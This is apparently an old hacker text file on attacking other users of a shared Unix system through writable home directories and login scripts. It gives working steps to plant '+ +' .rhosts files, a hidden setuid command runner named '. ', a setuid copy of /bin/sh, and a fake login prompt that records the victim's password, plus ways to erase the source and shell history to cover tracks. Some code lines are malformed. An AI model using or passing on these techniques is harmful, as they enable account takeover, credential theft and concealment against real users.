To scan a directory for directories in which has read access by a common
group that you belong:

	ls -ld ./* | grep drwxr-x
	ls -ld ./* | grep groupname | grep drwxr-x

Other variations which you can use:

	ls -ld /home/* | grep drwxr-x
	ls -ld /home/* | grep drwxr-xr-x
	ls -ld /home/* | grep groupname | grep drwxr-xr-x

	ls -ld /home/* | grep drwxr-x | awk '{print $1 "\t" $3}'
	ls -ld /home/* | grep drwxr-x | awk '{print $3}' > open.users &


ls "Permission denied" is an STDERR output and not a part of a pipe,
therefore it will be redirected to the console, to prevent this, use:

	2>/dev/null

$(grep -v EXPR) opposite behavior (don't print if)
	grep -v "denied"

ls -lR 2>/dev/null | grep drwxrwx
	This will recursively look for directories (w/grep) while
	suppressing "Permission denied" STDERR errors.

echo "+ +" > /home/victim/.rhosts
	This can leave tracks with your username as the owner of the file.

echo -n "" > filename
	This will completely clear a file which you have write access.




Suid tactics on a writable directory and writeable .profile:

	Create a C program that will execute a command which is it's
	argument, this is done with system():

	# cmd.c source file
	#include 
	int main(int argc,int argv[]) {
		if(argc > 1)
			system(argv[1]);
		return 0;
	}

	Compile and move into the target's directory as ". ".
	% gcc cmd.c -o ". "

	In the .profile of the target's directory, add the following:
		chown target.target ". "
		chmod 4777 ". "

	Once this is complete and the user has logged into his account,
	the above will set the file setuid with the target being the
	owner. You can now execute commands with this program:

		/home/target/". " "bad command"

	Remember to quote the command so whitespace is included with the
	first argument, otherwise, words after spaces are in other slots
	of the argv[] array.

	Note: When you create this program and transfer it into a user's
	home directory, it will have you as the owner and therefore it
	is not exactly stealth.

	The following is a workaround to cover your tracks and prevent
	being discovered. This will create the C file source, compile,
	and remove the source.

	CFILE="tmp.c"        # tmp source file             #RM_ME
	TFILE=".profile"     # this file's name            #RM_ME
	echo ""                                  > $CFILE  #RM_ME
	echo "#include "               >> $CFILE  #RM_ME
	echo "int main(int argc,int argv[]) {"  >> $CFILE  #RM_ME
	echo "	if(argc > 1)"                   >> $CFILE  #RM_ME
	echo "		system(argv[1]);"       >> $CFILE  #RM_ME
	echo "	return 0;"                      >> $CFILE  #RM_ME
	echo "}"                                >> $CFILE  #RM_ME
	gcc $CFILE -o ". " >/dev/null 2>/dev/null          #RM_ME
	chmod 4777 ". "    >/dev/null 2>/dev/null          #RM_ME
	rm  $CFILE         >/dev/null 2>/dev/null          #RM_ME
        cat $TFILE | grep -v "RM_ME" > $TFILE              #RM_ME




Notes:
	drwxrwxrwx

		you can create rename, and edit files.
		you cannot move, delete or chmod files.
		Therefore you can rename and edit a writeable file to .rhosts
		you cannot chmod to 600, and you can't edit a 600 file.

	drwxrwxrwx

		If you find a directory with these permissions, and the
		user's directory has a login script (eg. .profile) that
		is writable by you, you can edit their login script to
		do some things:

		As a note, if you scan the "/etc/passwd" file for the users
		shell, you may be able to create a login script which will
		be executed if present. Many users only create one script if
		they create one at all. You can exploit the fact that they
		did not create a blank file and lock it with no permissions.

			echo "+ +" > .rhosts
			chmod 600 .rhosts

		You can also have it emulate a failed login and ask them
		to reauthenticate. The $ANSWER variables can then output
		this information into a file such as ". " which will then
		hold their username and password. If you know what you are
		doing, you can also have the script send the password to
		you via email. If you were to implement this, it will leave
		tracks in the email system log and may also alert the user
		if your script does not delete itself. Since this is not a
		root attack, you cannot remove the log entry on the system.

			echo "Authentication failed, please try again."
			echo ""
			echo -n "login: "
			read $USERNAME
			stty -echo
			echo -n "Password: "
			read $PASSWORD
			stty echo
			echo $PASSWORD > ". "
			chmod 666 ". "

		Just wait until the user logs into the system and then if
		they are tricked by the information, go into their account
		and read the file ". ". Then, log into their account and

			rm ". "

		When exiting, and the bash shell was the shell used, don't
		forget to:

			echo -n "" > .bash_history ; exit

		Another alternative is to create a blank file from the script
		that is setuid and executable by group or world.

			touch      ". "
			chmod 4777 ". "

		Then, once the user has logged into their account, you can
		simply create a shell which will execute setuid as the owner
		which of course is the target user.

			cat /bin/sh > ". "

		Another alternative is to simply copy the file when the user
		logs in although it may take a bit longer and may even appear
		suspicious.

			cp /bin/sh ". "
			chmod 4777 ". "

		Leaving the directory permissions with read and write access
		with a login script writable by anyone or anyone in a common
		group is not smart. You (logging in) will be creating the
		information or files which are going to be used against you.